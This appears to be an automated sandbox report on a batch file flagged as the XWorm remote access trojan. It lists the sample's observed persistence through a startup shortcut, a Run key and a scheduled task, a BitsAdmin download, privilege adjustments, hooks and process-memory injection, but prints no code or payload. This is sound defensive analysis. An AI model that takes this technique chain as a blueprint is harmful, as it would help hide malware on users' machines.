Malware Analysis Report

2024-11-16 13:42

Sample ID 240601-cty4vsfc83
Target StandShooter.bat
SHA256 dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc4ad7f04bd7f277494092d4db0c337b1b4bbe5d0bc8a667babf5f3045144416

Threat Level: Known bad

The file StandShooter.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Download via BitsAdmin

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 02:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 02:22

Reported

2024-06-01 02:24

Platform

win11-20240508-en

Max time kernel

90s

Max time network

90s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Stand C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133616821810434133" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133616822420475821" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1 C:\Windows\system32\svchost.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 404 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 404 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 404 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 3100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1044 wrote to memory of 3100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3100 wrote to memory of 652 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3100 wrote to memory of 652 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 652 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 652 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 652 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 652 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1548 wrote to memory of 3276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1548 wrote to memory of 2552 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1152 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 1512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1548 wrote to memory of 4264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1548 wrote to memory of 2236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
